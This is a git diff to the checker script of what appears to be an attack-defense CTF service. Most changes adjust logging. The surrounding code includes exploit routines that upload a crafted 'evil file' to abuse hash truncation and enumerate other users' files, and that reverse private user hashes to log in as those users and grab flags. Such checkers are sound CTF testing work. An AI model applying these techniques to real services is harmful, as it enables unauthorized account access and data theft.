1 files changed, 13 insertions, 9 deletions

diff --git a/checker/src/checker.py b/checker/src/checker.py
index 3f12417..3c4fc9f 100644
--- a/checker/src/checker.py
+++ b/checker/src/checker.py
@@ -109,6 +109,10 @@ class Session:
         await self.writer.drain()
 
     def write(self, data: bytes) -> None:
+        if len(data) > 100:
+            self.logger.debug(f"Sending {data[:100]!r}..");
+        else:
+            self.logger.debug(f"Sending {data!r}");
         self.writer.write(data)
 
     async def prepare(self) -> None:
@@ -370,7 +374,7 @@ async def getdb(db: ChainDB, key: str) -> tuple[Any, ...]:
 async def do_auth(
     session: Session, authstr: bytes, check: bool = True, newuser: bool = True
 ) -> Optional[bytes]:
-    session.logger.debug(f"Logging in with {authstr!r}")
+    # Login with authstr
     session.write(b"auth\n")
     session.write(authstr + b"\n")
     await session.drain()
@@ -1027,14 +1031,13 @@ async def exploit_prefix_truncation(
     modelname = fakeid()
     searcher = await di.get(FlagSearcher)
 
-    session = await di.get(Session)
-    session.logger.debug("Uploading evil file for hash truncation")
-
+    # Generate exploit payload using attack_info
     assert task.attack_info is not None
     target_prefix = task.attack_info.split()[1][:-2].encode()
+    evil_file = exploit_0_file_prefix + target_prefix + exploit_0_file_suffix
 
     # Upload evil file
-    evil_file = exploit_0_file_prefix + target_prefix + exploit_0_file_suffix
+    session = await di.get(Session)
     await do_upload(session, modelname, stlfile=evil_file, check=True)
     await do_search(session, modelname, download=False, check=True)
 
@@ -1052,7 +1055,6 @@ async def exploit_prefix_truncation(
     # Use it to enumerate other files and grab contents
     flag = None
     for fhash in filelist:
-        session.logger.debug(f"Retrieving file {fhash}")
         session.write(fhash + b"\n")
         session.write(b"n\n")
         await session.drain()
@@ -1064,7 +1066,6 @@ async def exploit_prefix_truncation(
             b"==================", ctx="getting file info (1)"
         )
         resp += await session.readuntil(b"[q to quit]: ", ctx="getting file info (2)")
-        session.logger.critical(resp)
         if flag := searcher.search_flag(resp):
             break
 
@@ -1101,17 +1102,20 @@ async def exploit_hash_overflow(
 
     # Get private user hashes via 'list'
     resp = await do_list(session, check=True)
-    session.logger.critical(resp)
     users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
     await session.exit()
 
+    # Check if there is a flag in the response already
+    # (shouldn't be, enochecker_test will throw an error if this succeeds)
+    if flag := searcher.search_flag(resp):
+        return flag
+
     # Login as each private user
     for userhash in users:
         if not userhash.startswith(target_prefix):
             continue
 
         # Find preimage of user hash
-        session.logger.debug(f"Logging in as user with id {userhash!r}")
         authstr = reverse_hash(userhash.decode())
 
         # Authenticate and check if the user is new